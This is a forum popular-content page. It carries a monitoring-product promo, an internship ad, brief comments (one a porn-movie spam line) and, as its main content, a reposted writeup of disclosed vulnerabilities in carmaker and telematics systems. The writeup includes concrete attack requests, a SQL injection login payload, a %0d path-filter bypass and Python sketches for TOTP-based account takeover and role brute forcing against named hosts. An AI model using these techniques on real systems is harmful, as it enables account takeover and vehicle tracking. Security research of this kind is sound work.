
Leaderboard

Popular Content

Showing content with the highest reputation since 01/05/23 in all areas

  1. Hi everyone. I have a cybersecurity project that I've been working on for a while together with a former work colleague, and I'd like to present it to you in the hope that you'll come and test it. We were also at DefCamp, where we had a stand (thanks @Andrei for the opportunity), and we ran a bug bounty program (which is still valid: whoever finds and reports a valid bug will be rewarded with Emag vouchers, depending on severity).

In short, it's https://razdon.com, a website that lets you "onboard" your site and watch your traffic LIVE, with extra security context on every request. This live part is presented as a dashboard where you can see a world map and all the requests coming toward your server's location. A screenshot is attached below. As you can see, the project was developed on RST, and here you can see a window of roughly 8 hours with all the RST statistics over those 8 hours, plus the live traffic, of course.

Besides the live dashboard, which requires minimal interaction (practically just selecting the site in scope, in case you have several), there is also the traffic-analysis part. In the traffic-analysis part you have the option to search all requests over a given time period for something specific (e.g. all requests with status code 4XX or 3XX). The analysis page also shows a short history of recent attacks (including their type). You can see a piece of this page below.

Another fairly interesting menu is the SSL certificates one, where you can check your certificate's expiry date (and in the future we will also implement an alerting system, for both certificates and attacks). A screenshot of the certificates part is below.

We could also implement a WAF, but for the moment we have zero focus in that direction. Very soon we will also release a beta of the artificial intelligence / machine learning part, with which we will maximize the efficiency of attack detection.

That said, if anyone is interested in such a product, registrations are open and you can follow the required steps to view your traffic. To head off the "how do you do this" questions: the only thing needed for all of this is the Apache or nginx logs with the website's traffic. At the moment we collect these logs with a binary written in Go (for efficiency), but I will also publish the raw variant of sending the logs to our API without running a binary (for safety reasons); a minimal sketch of what that raw variant could look like is below. A small diagram to better understand how it all fits together is attached below.

Thanks, and have a nice evening! P.S. If anyone wants to buy us for about 2-3 million euros, send me a DM; after that it gets more expensive.
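As a rough illustration of the raw log-shipping variant mentioned above, here is a minimal sketch in Python. The ingest URL, API key, and payload format are hypothetical (the post does not document them); it just tails an nginx access log and POSTs new lines in small batches.

import time
import requests  # third-party: pip install requests

API_URL = "https://api.razdon.example/v1/logs"  # hypothetical ingest endpoint
API_KEY = "YOUR_API_KEY"                        # hypothetical credential
LOG_PATH = "/var/log/nginx/access.log"

def follow(path):
    """Yield new lines appended to the log file, tail -f style."""
    with open(path, "r") as f:
        f.seek(0, 2)  # start at end of file
        while True:
            line = f.readline()
            if not line:
                time.sleep(0.5)
                continue
            yield line.rstrip("\n")

batch = []
for line in follow(LOG_PATH):
    batch.append(line)
    if len(batch) >= 50:  # ship in small batches
        requests.post(API_URL,
                      json={"lines": batch},
                      headers={"Authorization": f"Bearer {API_KEY}"},
                      timeout=10)
        batch = []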
    8 points
  2. Hi. The company where I work has recently opened an internship program for people passionate about cyber security, or for those who would like to start a career in this field. It is aimed especially at students from technical or CS faculties who are still studying, or who have graduated and want to move toward the cyber-security area. Although I work here and you could say I'm biased, I find it great that no prior cyber-security experience is required, that you can follow this internship from wherever you want (remote/hybrid/office), and that you get the chance to start out in a dynamic (and in-demand) field while being guided by experienced people. In addition, you will get to learn and practice the methods hackers use when testing the security of systems, as well as the defensive strategies companies use against cyber attacks. I'll let you discover the rest of the details by visiting the role's page: HERE. And of course, at the end of the internship, the interns who join us can become our permanent colleagues. If you are interested and would like more details, please leave a comment and I will answer as time permits.
    7 points
  3. Reported. Let's wait and see what happens.
    6 points
  4. xxx porn movies 2023, online, subtitled in Romanian
    6 points
  5. If Sadoveanu had known that your thick-headed generations were coming ....
    5 points
  6. Probably a Windows license. For about 10 years now, this has been turning more and more into prostitution.
    4 points
  7. Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More
January 3, 2023, samwcyo

During the fall of 2022, a few friends and I took a road trip from Chicago, IL to Washington, DC to attend a cybersecurity conference and (try to) take a break from our usual computer work. While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn't resist poking at the scooters' mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight.

When everything eventually settled down, we sent a report over to the scooter manufacturer and became super interested in trying to find more ways to make more things honk. We brainstormed for a while, and then realized that nearly every automobile manufactured in the last 5 years had nearly identical functionality. If an attacker were able to find vulnerabilities in the API endpoints that vehicle telematics systems used, they could honk the horn, flash the lights, remotely track, lock/unlock, and start/stop vehicles, completely remotely.

At this point, we started a group chat and all began to work with the goal of finding vulnerabilities affecting the automotive industry. Over the next few months, we found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports them.

Findings Summary

During our engagement, we found the following vulnerabilities in the companies listed below:

Kia, Honda, Infiniti, Nissan, Acura
- Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number
- Fully remote account takeover and PII disclosure via VIN number (name, phone number, email address, physical address)
- Ability to lock users out of remotely managing their vehicle, change ownership
- For Kias specifically, we could remotely access the 360-view camera and view live images from the car

Mercedes-Benz
- Access to hundreds of mission-critical internal applications via improperly configured SSO, including:
  - Multiple GitHub instances behind SSO
  - Company-wide internal chat tool, ability to join nearly any channel
  - SonarQube, Jenkins, misc. build servers
  - Internal cloud deployment services for managing AWS instances
  - Internal vehicle-related APIs
- Remote code execution on multiple systems
- Memory leaks leading to employee/customer PII disclosure, account access

Hyundai, Genesis
- Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the victim's email address
- Fully remote account takeover and PII disclosure via the victim's email address (name, phone number, email address, physical address)
- Ability to lock users out of remotely managing their vehicle, change ownership

BMW, Rolls Royce
- Company-wide core SSO vulnerabilities which allowed us to access any employee application as any employee; this allowed us to:
  - Access internal dealer portals where you can query any VIN number to retrieve sales documents for BMW
  - Access any application locked behind SSO on behalf of any employee, including applications used by remote workers and dealerships

Ferrari
- Full zero-interaction account takeover for any Ferrari customer account
- IDOR to access all Ferrari customer records
- Lack of access control allowing an attacker to create, modify, and delete employee "back office" administrator user accounts, and all user accounts with capabilities to modify Ferrari-owned web pages through the CMS system
- Ability to add HTTP routes on api.ferrari.com (rest-connectors) and view all existing rest-connectors and the secrets associated with them (authorization headers)

Spireon
- Multiple vulnerabilities, including:
  - Full administrator access to a company-wide administration panel with the ability to send arbitrary commands to an estimated 15.5 million vehicles (unlock, start engine, disable starter, etc.), read any device location, and flash/update device firmware
  - Remote code execution on core systems for managing user accounts, devices, and fleets; ability to access and manage all data across all of Spireon
  - Ability to fully take over any fleet (this would've allowed us to track & shut off starters for police, ambulance, and law-enforcement vehicles for a number of different large cities and dispatch commands to those vehicles, e.g. "navigate to this location")
  - Full administrative access to all Spireon products, including:
    - GoldStar - https://www.spireon.com/products/goldstar/
    - LoJack - https://www.spireon.com/products/goldstar/lojackgo/
    - FleetLocate - https://www.spireon.com/products/fleetlocate-for-fleet-managers/
    - NSpire - https://www.spireon.com/spireon-nspire-platform/
    - Trailer & Asset - https://www.spireon.com/solutions/trailer-asset-managers/
- In total, this covered 15.5 million devices (mostly vehicles) and 1.2 million user accounts (end-user accounts, fleet managers, etc.)

Ford
- Full memory disclosure on the production vehicle telematics API, disclosing customer PII and access tokens for tracking and executing commands on vehicles, as well as configuration credentials used for internal services related to telematics
- Ability to authenticate into a customer account, access all PII, and perform actions against vehicles
- Customer account takeover via improper URL parsing, allowing an attacker to completely access a victim's account, including the vehicle portal

Reviver
- Full super-administrative access to manage all user accounts and vehicles for all Reviver connected vehicles. An attacker could:
  - Track the physical GPS location and manage the license plate for all Reviver customers (e.g. changing the slogan at the bottom of the license plate to arbitrary text)
  - Update any vehicle status to "STOLEN", which updates the license plate and informs authorities
  - Access all user records, including what vehicles people owned, their physical address, phone number, and email address
  - Access the fleet management functionality for any company, locate and manage all vehicles in a fleet

Porsche
- Ability to retrieve vehicle location, send vehicle commands, and retrieve customer information via vulnerabilities affecting the vehicle telematics service

Toyota
- IDOR on Toyota Financial disclosing the name, phone number, email address, and loan status of any Toyota Financial customer

Jaguar, Land Rover
- User account IDOR disclosing password hash, name, phone number, physical address, and vehicle information

SiriusXM
- Leaked AWS keys with full organizational read/write S3 access, with the ability to retrieve all files, including (what appeared to be) user databases, source code, and config files for Sirius

Vulnerability Writeups

(1) Full Account Takeover on BMW and Rolls Royce via Misconfigured SSO

While testing BMW assets, we identified a custom SSO portal for employees and contractors of BMW. This was super interesting to us, as any vulnerabilities identified here could potentially allow an attacker to compromise any account connected to all of BMW's assets. For instance, if a dealer wanted to access the dealer portal at a physical BMW dealership, they would have to authenticate through this portal. Additionally, this SSO portal was used to access internal tools and related devops infrastructure.

The first thing we did was fingerprint the host using OSINT tools like gau and ffuf. After a few hours of fuzzing, we identified a WADL file which exposed the API endpoints on the host via sending the following HTTP request:

GET /rest/api/application.wadl HTTP/1.1
Host: xpita.bmwgroup.com

The HTTP response contained all available REST endpoints on the xpita host. We began enumerating the endpoints and sending mock HTTP requests to see what functionality was available. One immediate finding was that we were able to query all BMW user accounts via sending asterisk queries in the user field API endpoint. This allowed us to enter something like "sam*" and retrieve the user information for a user named "sam.curry" without having to guess the actual username.

HTTP Request
GET /rest/api/users/example* HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response
HTTP/1.1 200 OK
Content-type: application/json

{"id":"redacted","firstName":"Example","lastName":"User","userName":"example.user"}

Once we found this vulnerability, we continued testing the other accessible API endpoints. One particularly interesting one which stood out immediately was the "/rest/api/chains/accounts/:user_id/totp" endpoint. We noticed the word "totp", which usually stands for time-based one-time password generation. When we sent an HTTP request to this endpoint using the SSO user ID gained from the wildcard query paired with the TOTP endpoint, it returned a random 7-digit number. The following HTTP request and response demonstrate this behavior:

HTTP Request
GET /rest/api/chains/accounts/unique_account_id/totp HTTP/1.1
Host: xpita.bmwgroup.com

HTTP Response
HTTP/1.1 200 OK
Content-type: text/plain

9373958

For whatever reason, it appeared that this HTTP request would generate a TOTP for the user's account.
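Chaining the two behaviors above is straightforward. The following is a minimal sketch of that discovery flow, assuming the endpoint paths quoted in the writeup; the response fields and error handling are simplified for illustration and are not taken from the original research code.

import requests  # pip install requests

BASE = "https://xpita.bmwgroup.com"  # host from the writeup

def find_user(prefix):
    """Wildcard user lookup: 'sam*' resolves to e.g. 'sam.curry'."""
    r = requests.get(f"{BASE}/rest/api/users/{prefix}*", timeout=10)
    r.raise_for_status()
    return r.json()  # assumed shape: {"id": ..., "userName": ...}

def get_totp(user_id):
    """The misconfigured endpoint hands back a valid reset TOTP."""
    r = requests.get(f"{BASE}/rest/api/chains/accounts/{user_id}/totp",
                     timeout=10)
    r.raise_for_status()
    return r.text.strip()  # e.g. "9373958"

user = find_user("example")
print(user["userName"], get_totp(user["id"]))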
We guessed that this interaction worked with the "forgot password" functionality, so we found an example user account by querying "example*" using our original wildcard finding and retrieving the victim user ID. After retrieving this ID, we initiated a password reset attempt for the user account until we got to the point where the system requested a TOTP code from the user's 2FA device (e.g. email or phone). At this point, we retrieved the TOTP code generated from the API endpoint and entered it into the reset password confirmation field.

It worked! We had reset a user account, gaining full account takeover on any BMW employee and contractor user. At this point, it was possible to completely take over any BMW or Rolls Royce employee account and access tools used by those employees.

To demonstrate the impact of the vulnerability, we simply Googled "BMW dealer portal" and used our account to access the dealer portal used by sales associates working at physical BMW and Rolls Royce dealerships. After logging in, we observed that the demo account we took over was tied to an actual dealership, and we could access all of the functionality that the dealers themselves had access to. This included the ability to query a specific VIN number and retrieve sales documents for the vehicle. With our level of access, there was a huge amount of functionality we could've performed against BMW and Rolls Royce customer accounts and customer vehicles. We stopped testing at this point and reported the vulnerability. The vulnerabilities reported to BMW and Rolls Royce have since been fixed.

(2) Remote Code Execution and Access to Hundreds of Internal Tools on Mercedes-Benz and Rolls Royce via Misconfigured SSO

Early in our testing, someone in our group had purchased a Mercedes-Benz vehicle, so we began auditing the Mercedes-Benz infrastructure. We took the same approach as with BMW and began testing the Mercedes-Benz employee SSO. We weren't able to find any vulnerabilities affecting the SSO portal itself, but by exploring the SSO website we observed that they were running some form of LDAP for the employee accounts. Based on our high-level understanding of their infrastructure, we guessed that the individual employee applications used a centralized LDAP system to authenticate users. We began exploring each of these websites in an attempt to find a public registration, so we could gain SSO credentials to access, even at a limited level, the employee applications.

After fuzzing random sites for a while, we eventually found the "umas.mercedes-benz.com" website, which was built for vehicle repair shops to request specific tool access from Mercedes-Benz. The website had public registration enabled, as it was built for repair shops, and appeared to write to the same database as the core employee LDAP system.

We filled out all the required fields for registration, created a user account, then used our recon data to identify sites which redirected to the Mercedes-Benz SSO. The first one we attempted was a pretty obvious employee tool: "git.mercedes-benz.com", short for GitHub. We attempted to use our user credentials to sign in to the Mercedes-Benz GitHub and saw that we were able to log in. Success!

The Mercedes-Benz GitHub, after authenticating, asked us to set up 2FA on our account so we could access the app. We installed the 2FA app, added it to our account, entered our code, then saw that we were in. We had access to "git.mercedes-benz.com" and began looking around.

After a few minutes, we saw that the GitHub instance had internal documentation and source code for various Mercedes-Benz projects, including the Mercedes Me Connect app, which was used by customers to remotely connect to their vehicles. The internal documentation gave detailed instructions for employees to follow if they wanted to build an application that talks to customer vehicles, including the specific steps one would have to take to do so.

At this point, we reported the vulnerability, but got some pushback after a few days of waiting on an email response. The team seemed to misunderstand the impact, so they asked us to demonstrate further impact. We used our employee account to log in to numerous applications which contained sensitive information and achieved remote code execution via exposed actuators, Spring Boot consoles, and dozens of sensitive internal applications used by Mercedes-Benz employees. One of these applications was the Mercedes-Benz Mattermost (basically Slack). We had permission to join any channel, including security channels, and could pose as a Mercedes-Benz employee who could ask whatever questions necessary for an actual attacker to elevate their privileges across the Benz infrastructure.

To give an overview, we could access the following services:
- Multiple employee-only GitHubs with sensitive information containing documentation and configuration files for multiple applications across the Mercedes-Benz infrastructure
- Spring Boot actuators leading to remote code execution and information disclosure on sensitive employee- and customer-facing applications
- Jenkins instances
- AWS and cloud-computing control panels where we could request, manage, and access various internal systems
- XENTRY systems used to communicate with customer vehicles
- Internal OAuth and application-management functionality for configuring and managing internal apps
- Hundreds of miscellaneous internal services

(3) Full Vehicle Takeover on Kia via Deprecated Dealer Portal

When we looked at Kia, we noticed how its vehicle enrollment process was different from its parent company Hyundai's. We mapped out all of the domains and came across the "kdealer.com" domain, where dealers are able to register for an account to activate Kia Connect for customers who purchase vehicles. At this point, we found the domain "kiaconnect.kdealer.com", which allowed us to enroll an arbitrary VIN but required a valid session to work.

While looking at the website's main.js code, we observed the following authorization functionality for generating the token required to access the website functionality:

validateSSOToken() {
    const e = this.geturlParam("token"),
        i = this.geturlParam("vin");
    return this.postOffice({
        token: e,
        vin: i
    }, "/prof/gbl/vsso", "POST", "preLogin").pipe(ye(this.processSuccessData), Nn(this.handleError))
}

Since we didn't have valid authorization credentials, we continued to search through the JavaScript file until finding the "prelogin" header. This header, when sent, allowed us to initiate enrollment for an arbitrary VIN number. Although we were able to bypass the authorization check for VIN ownership, the website continued throwing errors for an invalid session.

To bypass this, we took a session token from "owners.kia.com" (the site used by customers to remotely connect to their vehicles) and appended it to our request to pair the VIN number to a customer account.

Something really interesting to note: for every Kia account that we queried, the server returned an associated profile with the email "daspike11@yahoo.com". We're not sure if this email address has access to the user account, but based on our understanding of the Kia website, it appeared that the email address was connected to every account that we had searched. We've asked the Kia team for clarification but haven't heard back on what exactly this is.

Now that we had a valid vehicle initialization session, we could use the JSON returned in the HTTP response from pairing the customer's account to continue the vehicle takeover. We would use the "prelogin" header once again to generate a dealer token (intended to be accessed by Kia dealers themselves) to pair any vehicle to the attacker's customer account. Lastly, we can just head to the link to finish the activation and enrollment. The attacker will receive a link via email on their Kia customer account after the above dealer pairing process is completed. The activation portal is the final step to pair the Kia vehicle to the attacker's customer account.

Lastly, after we've filled out the above form, it takes about 1-2 minutes for Kia Connect to fully activate and give full access to send lock, unlock, remote start, remote stop, and locate commands, and (most interestingly) remotely access the vehicle cameras!

(4) Full Account Takeover on Ferrari and Arbitrary Account Creation allows Attacker to Access, Modify, and Delete All Customer Information and Access Administrative CMS Functionality to Manage Ferrari Websites

When we began targeting Ferrari, we mapped out all domains under the publicly available domains like "ferrari.com" and browsed around to see what was accessible. One target we found was "api.ferrari.com", a domain which offered both customer-facing and internal APIs for Ferrari systems. Our goal was to get the highest level of access possible for this API.

We analyzed the JavaScript present on several Ferrari subdomains that looked like they were for use by Ferrari dealers. These subdomains included `cms-dealer.ferrari.com`, `cms-new.ferrari.com` and `cms-dealer.test.ferrari.com`.

One of the patterns we notice when testing web applications is poorly implemented single sign-on functionality which does not restrict access to the underlying application. This was the case for the above subdomains. It was possible to extract the JavaScript for these applications, allowing us to understand the backend API routes in use.

When reverse engineering JavaScript bundles, it is important to check what constants have been defined for the application. Often these constants contain sensitive credentials, or at the very least tell you where the backend API that the application talks to is located. For this application, we noticed the following constants were set:

const i = {
    production: !0,
    envName: "production",
    version: "0.0.0",
    build: "20221223T162641363Z",
    name: "ferrari.dws-preowned.backoffice",
    formattedName: "CMS SPINDOX",
    feBaseUrl: "https://{{domain}}.ferraridealers.com/",
    fePreownedBaseUrl: "https://{{domain}}.ferrari.com/",
    apiUrl: "https://api.ferrari.com/cms/dws/back-office/",
    apiKey: "REDACTED",
    s3Bucket: "ferrari-dws-preowned-pro",
    cdnBaseUrl: "https://cdn.ferrari.com/cms/dws/media/",
    thronAdvUrl: "https://ferrari-app-gestioneautousate.thron.com/?fromSAML#/ad/"
}

From the above constants we can understand that the base API URL is `https://api.ferrari.com/cms/dws/back-office/` and a potential API key for this API is `REDACTED`. Digging further into the JavaScript, we can look for references to `apiUrl`, which will inform us as to how this API is called and how the API key is being used. For example, the following JavaScript sets certain headers if the API URL is being called:

})).url.startsWith(x.a.apiUrl) && !["/back-office/dealers", "/back-office/dealer-settings", "/back-office/locales", "/back-office/currencies", "/back-office/dealer-groups"].some(t => !!e.url.match(t)) && (e = (e = e.clone({
    headers: e.headers.set("Authorization", "" + (s || void 0))
})).clone({
    headers: e.headers.set("x-api-key", "" + a)
}));

All the elements needed for this discovery were conveniently tucked away in this JavaScript file. We knew what backend API to talk to and its routes, as well as the API key we needed to authenticate to the API.

Within the JavaScript, we noticed an API call to `/cms/dws/back-office/auth/bo-users`. When requesting this API through Burp Suite, it leaked all of the users registered for the Ferrari Dealers application. Furthermore, it was possible to send a POST request to this endpoint to add ourselves as a super admin user.

While impactful, we were still looking for a vulnerability that affected the broader Ferrari ecosystem and every end user. Spending more time deconstructing the JavaScript, we found some API calls being made to `rest-connectors`:

return t.prototype.getConnectors = function() {
    return this.httpClient.get("rest-connectors")
}, t.prototype.getConnectorById = function(t) {
    return this.httpClient.get("rest-connectors/" + t)
}, t.prototype.createConnector = function(t) {
    return this.httpClient.post("rest-connectors", t)
}, t.prototype.updateConnector = function(t, e) {
    return this.httpClient.put("rest-connectors/" + t, e)
}, t.prototype.deleteConnector = function(t) {
    return this.httpClient.delete("rest-connectors/" + t)
}, t.prototype.getItems = function() {
    return this.httpClient.get("rest-connector-models")
}, t.prototype.getItemById = function(t) {
    return this.httpClient.get("rest-connector-models/" + t)
}, t.prototype.createItem = function(t) {
    return this.httpClient.post("rest-connector-models", t)
}, t.prototype.updateItem = function(t, e) {
    return this.httpClient.put("rest-connector-models/" + t, e)
}, t.prototype.deleteItem = function(t) {
    return this.httpClient.delete("rest-connector-models/" + t)
}, t

The following request unlocked the final piece of the puzzle. Sending it revealed a treasure trove of API credentials for Ferrari:

GET /cms/dws/back-office/rest-connector-models HTTP/1.1

To explain this endpoint's purpose: Ferrari had configured a number of backend APIs that could be communicated with by hitting specific paths. When hitting this API endpoint, it returned the list of API endpoints, hosts, and authorization headers (in plain text). This information disclosure allowed us to query Ferrari's production API to access the personal information of any Ferrari customer. In addition to being able to view these API endpoints, we could also register new rest-connectors or modify existing ones.

HTTP Request
GET /core/api/v1/Users?email=ian@ian.sh HTTP/1.1
Host: fcd.services.ferrari.com

HTTP Response
HTTP/1.1 200 OK
Content-type: application/json

…"guid":"2d32922a-28c4-483e-8486-7c2222b7b59c","email":"ian@ian.sh","nickName":"ian@ian.sh","firstName":"Ian","lastName":"Carroll","birthdate":"1963-12-11T00:00:00"…

The API key and production endpoints that were disclosed using the previous staging API key allowed an attacker to access, create, modify, and delete any production user account. It additionally allowed an attacker to query users via email address or nickname. An attacker could also POST to the "/core/api/v1/Users/:id/Roles" endpoint to edit their user roles, setting themselves to have super-user permissions or become a Ferrari owner. This vulnerability would allow an attacker to access, modify, and delete any Ferrari customer account with access to manage their vehicle profile.

(5) SQL Injection and Regex Authorization Bypass on Spireon Systems allows Attacker to Access, Track, and Send Arbitrary Commands to 15 Million Telematics Systems and Additionally Fully Take Over Fleet Management Systems for Police Departments, Ambulance Services, Truckers, and Many Business Fleet Systems

When identifying car-related targets to hack on, we found the company Spireon. In the early 90s and 2000s, there were a few companies like OnStar, GoldStar, and FleetLocate which made standalone devices that were put into vehicles to track and manage them. The devices have the capability to be tracked and to receive arbitrary commands, e.g. locking the starter so the vehicle cannot start. Sometime in the past, Spireon acquired many GPS vehicle tracking and management companies and put them under the Spireon parent company.

We read through the Spireon marketing and saw that they claimed to have over 15 million connected vehicles. They offered services directly to customers, and additionally many services through their subsidiary companies like OnStar. We decided to research them because, if an attacker were able to compromise the administration functionality for these devices and fleets, they would be able to perform actions against over 15 million vehicles, with very interesting capabilities like sending a city's police officers a dispatch location, disabling vehicle starters, and accessing financial loan information for dealers.

Our first target for this was very obvious: admin.spireon.com. The website appeared to be a very out-of-date global administration portal for Spireon employees to authenticate and perform some sort of action. We attempted to identify interesting endpoints which were accessible without authorization, but kept getting redirected back to the login. Since the website was so old, we tried the trusted manual SQL injection payloads, but were kicked out by a WAF installed on the system.

We switched to a much simpler payload: sending an apostrophe, seeing if we got an error, then sending two apostrophes and seeing if we did not get an error. This worked! The system appeared to be reacting to sending an odd versus even number of apostrophes.
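The odd/even apostrophe probe is a classic low-noise SQL injection check. Here is a minimal sketch of the idea in Python; the login URL and parameter names are hypothetical, and a test like this should only ever be run with authorization.

import requests  # pip install requests

LOGIN_URL = "https://admin.example.com/login"  # placeholder target

def login_status(username):
    """Submit a login attempt and report the raw response status."""
    r = requests.post(LOGIN_URL,
                      data={"username": username, "password": "x"},
                      allow_redirects=False, timeout=10)
    return r.status_code

# One apostrophe breaks the quoting in a vulnerable query (error),
# while two apostrophes form an escaped literal quote (no error).
odd = login_status("victim'")
even = login_status("victim''")
if odd != even:
    print("responses differ -> input likely reaches a SQL query")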
This indicated that our input in both the username and password fields was being passed to a system which was likely vulnerable to some sort of SQL injection attack. For the username field, we came up with a very simple payload:

victim' #

The above payload was designed to simply cut the password check off from the SQL query. We sent this HTTP request to Burp Suite's Intruder with a common username list and observed that we received various 301 redirects to "/dashboard" for the usernames "administrator" and "admin". After manually sending the HTTP request using the admin username, we observed that we were authenticated into the Spireon administrator portal as an administrator user.

At this point, we browsed around the application and saw many interesting endpoints. The functionality was designed to manage Spireon devices remotely. The administrator user had access to all Spireon devices, including those of OnStar, GoldStar, and FleetLocate. We could query these devices, retrieve the live location of whatever the devices were installed on, and additionally send arbitrary commands to these devices. There was additional functionality to overwrite the device configuration, including which servers it reached out to in order to download updated firmware. Using this portal, an attacker could create a malicious Spireon package, update the vehicle configuration to call out to the modified package, then download and install the modified Spireon software. At this point, an attacker could backdoor the Spireon device and run arbitrary commands against it.

Since these devices were very ubiquitous and were installed on things like tractors, golf carts, police cars, and ambulances, the impact of each device differed. For some, we could only access the live GPS location of the device, but for others we could disable the starter and send police and ambulance dispatch locations. We reported the vulnerability immediately.

During testing, however, we had observed an HTTP 500 error which disclosed the URL of the backend API endpoint that the "admin.spireon.com" service reached out to. Initially we dismissed this, assuming it was internal, but after circling back we observed that we could hit the endpoint and it would trigger an HTTP 403 forbidden error. Our goal now was to see if we could find some sort of authorization bypass on the host, and which endpoints were accessible. By bypassing the administrator UI, we could reach each device directly and make direct queries for vehicles and user accounts via the backend API calls.

We fuzzed the host and eventually observed some weird behavior: for any string containing "admin" or "dashboard", the system would trigger an HTTP 403 forbidden response, but it would return a 404 if we didn't include those strings. As an example, if we attempted to load "/anything-admin-anything" we'd receive 403 forbidden, while if we attempted to load "/anything-anything" it would return a 404.

We took the blacklisted strings, put them in a list, then attempted to enumerate the specific endpoints with fuzzing characters (%00 to %FF) stuck behind the first and last characters. During scanning, we saw that the following HTTP requests would return a 200 OK response:

GET /%0dadmin
GET /%0ddashboard

Through Burp Suite, we sent the HTTP response to our browser and observed the result: it was a full administrative portal for the core Spireon app. We quickly set up a match-and-replace rule to rewrite GET /admin and GET /dashboard to the endpoints with the %0d prefix.
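A sketch of the prefix-fuzzing step described above, with a hypothetical backend host; it simply walks %00 through %FF in front of the blacklisted path words and reports which variants slip past the 403 filter.

import requests  # pip install requests

BASE = "https://api.example.com"   # placeholder backend host
WORDS = ["admin", "dashboard"]     # strings the regex filter blocked

for word in WORDS:
    for byte in range(0x00, 0x100):
        path = f"/%{byte:02x}{word}"
        # requests leaves existing percent-encoded sequences intact,
        # so the raw encoded byte reaches the server as written.
        r = requests.get(BASE + path, timeout=10)
        if r.status_code == 200:
            # e.g. /%0dadmin -> 200 OK: the filter no longer matches,
            # but the backend still routes to the admin endpoint.
            print(path, r.status_code)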
After setting up this rule, we could browse to "/admin" or "/dashboard" and explore the website without having to perform any additional steps. We observed that there were dozens of endpoints which were used to query all connected vehicles, send arbitrary commands to connected vehicles, and view all customer tenant accounts, fleet accounts, and customer accounts. We had access to everything.

At this point, a malicious actor could backdoor the 15 million devices, query the ownership information associated with a specific VIN, retrieve the full user information for all customer accounts, and invite themselves to manage any fleet connected to the app. For our proof of concept, we invited ourselves to a random fleet account and saw that we received an invitation to administrate a US police department, where we could track the entire police fleet.

(6) Mass Assignment on Reviver allows an Attacker to Remotely Track and Overwrite the Virtual License Plates for All Reviver Customers, Track and Administrate Reviver Fleets, and Access, Modify, and Delete All User Information

In October 2022, California announced that it had legalized digital license plates. We researched this for a while and found that most, if not all, of the digital license plates were done through a company called Reviver. If someone wanted a digital license plate, they'd buy the virtual Reviver license plate, which included a SIM card for remotely tracking and updating the plate. Customers who use Reviver could remotely update their license plate's slogan and background, and additionally report the car as stolen by setting the plate tag to "STOLEN".

Since the license plate could be used to track vehicles, we were super interested in Reviver and began auditing the mobile app. We proxied the HTTP traffic and saw that all API functionality was done on the "pr-api.rplate.com" website. After creating a user account, our account was assigned to a unique "company" JSON object, which allowed us to add other sub-users to our account.

The company JSON object was super interesting, as we could update many of the JSON fields within the object. One of these fields was called "type" and was set to "CONSUMER" by default. After noticing this, we dug through the app source code in hopes that we could find another value to set it to, but were unsuccessful.

At this point, we took a step back and wondered if there was an actual website we could talk to, versus proxying traffic through the mobile app. We looked online for a while before getting the idea to perform a password reset on our account, which gave us a URL to navigate to. Once we opened the password reset URL, we observed that the website had tons of functionality, including the ability to administer vehicles, fleets, and user accounts. This was super interesting, as we now had many more API endpoints and much more functionality to access. Additionally, the JavaScript on the website appeared to contain the names of the other roles that our user account could be (e.g. specialized names for user, moderator, admin, etc.).

We queried the "CONSUMER" string in the JavaScript and saw that there were other roles defined there. After attempting to update our "role" parameter to the disclosed "CORPORATE" role, we refreshed our profile metadata and saw that it was successful! We were able to change our role to one other than the default user account, opening the door to potential privilege escalation vulnerabilities.

It appeared that, even though we had updated our account to the "CORPORATE" role, we were still receiving authorization errors when logging into the website. We thought for a while, until realizing that we could invite users to our modified account which had the elevated role; the invited users might then be granted the required permissions, since they were invited via an intended path rather than being mass-assigned into an elevated role.

After inviting a new account, accepting the invitation, and logging into the account, we observed that we no longer received authorization errors and could access fleet management functionality. This meant that we could likely (1) mass-assign our account to an even higher elevated role (e.g. admin), then (2) invite a user to our account, who would be assigned the appropriate permissions.

This perplexed us, as there was likely some administration group in the system that we had not yet identified. We brute forced the "type" parameter using wordlists until we noticed that setting our group to the number "4" had updated our role to "REVIVER_ROLE". It appeared that the roles were indexed to numbers, and we could simply run through the numbers 0-100 and find all the roles on the website.

The "0" role was the string "REVIVER", and after setting this on our account and re-inviting a new user, we logged into the website normally and observed that the UI was completely broken and we couldn't click any buttons. From what we could guess, we had the administrator role, but were accessing the account through the customer-facing frontend and not the appropriate administrator frontend. We would have to find the endpoints used by administrators ourselves.

Since our administrator account theoretically had elevated permissions, our first test was simply querying a user account and seeing if we could access someone else's data: this worked! We could take any of the normal API calls (viewing vehicle location, updating vehicle plates, adding new users to accounts) and perform the action using our super administrator account with full authorization.

At this point, we reported the vulnerability and observed that it was patched in under 24 hours. An actual attacker could have remotely updated, tracked, or deleted anyone's Reviver plate. We could additionally access any dealer (e.g. Mercedes-Benz dealerships will often package Reviver plates) and update the default image used by the dealer when the newly purchased vehicle still had DEALER tags. The Reviver website also offered fleet management functionality, which we had full access to.
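The role-index brute force lends itself to a very small loop. The following sketch uses a hypothetical profile endpoint and field names; the writeup only confirms the API host and that "type" was numerically indexed, with 4 mapping to "REVIVER_ROLE" and 0 to "REVIVER".

import requests  # pip install requests

API = "https://pr-api.rplate.com"           # API host from the writeup
PROFILE = f"{API}/api/v1/account/profile"   # hypothetical endpoint path
HEADERS = {"Authorization": "Bearer YOUR_SESSION_TOKEN"}  # placeholder

for idx in range(0, 101):
    # Mass assignment: the server copies client-supplied fields it
    # should never trust, including the role index.
    requests.patch(PROFILE, json={"type": idx},
                   headers=HEADERS, timeout=10)
    role = requests.get(PROFILE, headers=HEADERS,
                        timeout=10).json().get("role")
    print(idx, role)  # e.g. 4 -> REVIVER_ROLE, 0 -> REVIVER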
(7) Full Remote Vehicle Access and Full Account Takeover affecting Hyundai and Genesis

This vulnerability was written up on Twitter and can be accessed on the following thread:

(8) Full Remote Vehicle Access and Full Account Takeover affecting Honda, Nissan, Infiniti, Acura

This vulnerability was written up on Twitter and can be accessed on the following thread:

(9) Full Vehicle Takeover on Nissan via Mass Assignment

This vulnerability was written up on Twitter and can be accessed on the following thread:

Credits

The following people contributed towards this project:
